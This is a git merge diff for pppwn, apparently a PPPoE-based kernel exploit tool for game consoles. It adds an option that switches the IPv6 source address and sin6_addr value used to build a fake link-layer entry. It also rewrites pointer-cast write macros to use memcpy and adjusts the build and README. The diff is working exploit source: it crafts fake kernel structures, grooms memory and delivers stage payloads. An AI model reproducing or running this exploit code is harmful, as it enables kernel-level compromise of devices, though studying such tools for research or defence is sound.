Merge branch 'xfangfang:main' into main

Author: deviato

CMakeLists.txt

@@ -169,8 +169,8 @@ if (BUILD_CLI)
     add_custom_command(
             OUTPUT ${CMAKE_BINARY_DIR}/static.c
             WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
-            COMMAND ${ZIG} cc -o ${CMAKE_BINARY_DIR}/pack ${mongoose_SOURCE_DIR}/test/pack.c
-            COMMAND ${CMAKE_BINARY_DIR}/pack web/*.html web/*.ttf > ${CMAKE_BINARY_DIR}/static.c
+            COMMAND ${ZIG} cc ${CMAKE_C_FLAGS} -o ${CMAKE_BINARY_DIR}/pack ${mongoose_SOURCE_DIR}/test/pack.c
+            COMMAND ${CMAKE_BINARY_DIR}/pack web/index.html web/IBMPlexMono-Regular.ttf > ${CMAKE_BINARY_DIR}/static.c
             DEPENDS web/index.html
     )
 

README.md

@@ -84,6 +84,7 @@ pppwn --interface en0 --fw 1100 --stage1 "stage1.bin" --stage2 "stage2.bin" --ti
 - `-a` `--auto-retry`: automatically retry when fails or timeout
 - `-nw` `--no-wait-padi`: don't wait one more [PADI](https://en.wikipedia.org/wiki/Point-to-Point_Protocol_over_Ethernet#Client_to_server:_Initiation_(PADI)) before starting the exploit
 - `-rs` `--real-sleep`: use CPU for more precise sleep time (Only used when execution speed is too slow)
+- `-old` `--old-ipv6`: use previous IPv6 address to exploit (Only used when the exploit fails)
 - `--web`: use the web interface
 - `--url`: the url of the web interface (default: `0.0.0.0:7796`)
 

include/exploit.h

@@ -89,6 +89,8 @@ class Exploit {
 
     void setRealSleep(bool sleep);
 
+    void setOldIpv6(bool old);
+
     void closeInterface();
 
     void updateSourceMac(uint64_t value);
@@ -140,6 +142,7 @@ class Exploit {
     bool auto_retry{};
     bool wait_padi{};
     bool real_sleep{};
+    bool old_ipv6{};
     int timeout{};
     int wait_after_pin{1};
     int groom_delay{4};

src/exploit.cpp

@@ -1,5 +1,6 @@
 #include <iostream>
 #include <sstream>
+#include <cstring>
 
 #include <IPv6Layer.h>
 #include <IPv4Layer.h>
@@ -50,12 +51,18 @@
 
 const static std::string SOURCE_MAC = "41:41:41:41:41:41";
 const static std::string SOURCE_IPV4 = "41.41.41.41";
-const static std::string SOURCE_IPV6 = "fe80::9f9f:41ff:9f9f:41ff";
+const static std::string SOURCE_IPV6_1 = "fe80::4141:4141:4141:4141";
+const static std::string SOURCE_IPV6_2 = "fe80::9f9f:41ff:9f9f:41ff";
+const static uint64_t SIN6_ADDR_1 = 0x4141414141414141;
+const static uint64_t SIN6_ADDR_2 = 0x9f9f41ff9f9f41ff;
 
 const static std::string TARGET_IPV4 = "42.42.42.42";
 
 const static std::string BPF_FILTER = "((ip6) || (pppoed) || (pppoes && !ip))";
 
+static std::string SOURCE_IPV6 = SOURCE_IPV6_2;
+static uint64_t SIN6_ADDR = SIN6_ADDR_2;
+
 struct Cookie {
     pcpp::Packet packet;
 };
@@ -81,11 +88,11 @@ struct Cookie {
 #define htole16
 #endif
 
-#define V64BE(list, index, data) (*(uint64_t *) &(list)[index]) = htobe64(data)
-#define V64(list, index, data) (*(uint64_t *) &(list)[index]) = htole64(data)
-#define V32(list, index, data) (*(uint32_t *) &(list)[index]) = htole32(data)
-#define V16(list, index, data) (*(uint16_t *) &(list)[index]) = htole16(data)
-#define V8(list, index, data) (*(uint8_t *) &(list)[index]) = data
+#define V64BE(list, index, data) {uint64_t temp = htobe64(data); std::memcpy(&(list)[index], &temp, sizeof(uint64_t));}
+#define V64(list, index, data) {uint64_t temp = htole64(data); std::memcpy(&(list)[index], &temp, sizeof(uint64_t));}
+#define V32(list, index, data) {uint32_t temp = htole32(data); std::memcpy(&(list)[index], &temp, sizeof(uint32_t));}
+#define V16(list, index, data) {uint16_t temp = htole16(data); std::memcpy(&(list)[index], &temp, sizeof(uint16_t));}
+#define V8(list, index, data) {uint8_t temp = data; std::memcpy(&(list)[index], &temp, sizeof(uint8_t));}
 
 #define CHECK_RET(value) { int ret = (value); if(ret != RETURN_SUCCESS) return ret;}
 #define CHECK_RUNNING() if (!running) return RETURN_STOP
@@ -180,6 +187,12 @@ void Exploit::setRealSleep(bool sleep) {
     this->real_sleep = sleep;
 }
 
+void Exploit::setOldIpv6(bool old) {
+    this->old_ipv6 = old;
+    SOURCE_IPV6 = old ? SOURCE_IPV6_1 : SOURCE_IPV6_2;
+    SIN6_ADDR = old ? SIN6_ADDR_1 : SIN6_ADDR_2;
+}
+
 void Exploit::setTimeout(int value) {
     this->timeout = value;
 }
@@ -550,7 +563,7 @@ std::vector<uint8_t> Exploit::build_fake_lle(Exploit *self) {
     V32(fake_lle, 0xC4, 0);  // sin6_flowinfo
     // sin6_addr
     V64BE(fake_lle, 0xC8, 0xfe80000100000000);
-    V64BE(fake_lle, 0xD0, 0x9f9f41ff9f9f41ff);
+    V64BE(fake_lle, 0xD0, SIN6_ADDR);
     V32(fake_lle, 0xD8, 0);  // sin6_scope_id
 
     // pad
@@ -737,7 +750,7 @@ int Exploit::stage0() {
         }
 
         std::stringstream sourceIpv6;
-        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
+        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << SOURCE_IPV6.substr(10);
         {
             auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
                                                       pcpp::IPv6Address(sourceIpv6.str()), this->target_ipv6);
@@ -860,7 +873,7 @@ int Exploit::stage1() {
 
         sourceIpv6.clear();
         sourceIpv6.str("");
-        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
+        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << SOURCE_IPV6.substr(10);
 
         {
             auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
@@ -925,7 +938,8 @@ int Exploit::stage2() {
                 if (option[0] != 1) return false; // type 1 is ICMPv6NDOptSrcLLAddr
                 if (option[1] > 1) {
                     auto *self = (Exploit *) cookie;
-                    self->pppoe_softc_list = htole64(*(uint64_t * )(option + 3));
+                    std::memcpy(&self->pppoe_softc_list, option + 3, sizeof(uint64_t));
+                    self->pppoe_softc_list = htole64(self->pppoe_softc_list);
                     return true; // length > 1
                 }
                 return false;

src/main.cpp

@@ -126,6 +126,7 @@ int main(int argc, char *argv[]) {
     bool no_wait_padi = false;
     bool web_page = false;
     bool real_sleep = false;
+    bool old_ipv6 = false;
 
     auto cli = (
             ("network interface" % required("-i", "--interface") & value("interface", interface), \
@@ -142,6 +143,7 @@ int main(int argc, char *argv[]) {
             option("-bs", "--buffer-size") & integer("bytes", buffer_size), \
             "automatically retry when fails or timeout" % option("-a", "--auto-retry").set(retry), \
             "don't wait one more PADI before starting" % option("-nw", "--no-wait-padi").set(no_wait_padi), \
+            "Using the old ipv6 to exploit" % option("-old", "--old-ipv6").set(old_ipv6), \
             "Use CPU for more precise sleep time (Only used when execution speed is too slow)" %
             option("-rs", "--real-sleep").set(real_sleep), \
             "start a web page" % option("--web").set(web_page), \
@@ -165,6 +167,7 @@ int main(int argc, char *argv[]) {
 
     std::cout << "[+] args: interface=" << interface << " fw=" << fw << " stage1=" << stage1 << " stage2=" << stage2
               << " timeout=" << timeout << " wait-after-pin=" << wait_after_pin << " groom-delay=" << groom_delay
+              << " buffer-size=" << buffer_size << " old-ipv6=" << (old_ipv6 ? "on" : "off")
               << " auto-retry=" << (retry ? "on" : "off") << " no-wait-padi=" << (no_wait_padi ? "on" : "off")
               << " real_sleep=" << (real_sleep ? "on" : "off")
               << std::endl;
@@ -183,6 +186,7 @@ int main(int argc, char *argv[]) {
     exploit->setStage2(std::move(stage2_data));
     exploit->setTimeout(timeout);
     exploit->setWaitPADI(!no_wait_padi);
+    exploit->setOldIpv6(old_ipv6);
     exploit->setGroomDelay(groom_delay);
     exploit->setWaitAfterPin(wait_after_pin);
     exploit->setAutoRetry(retry);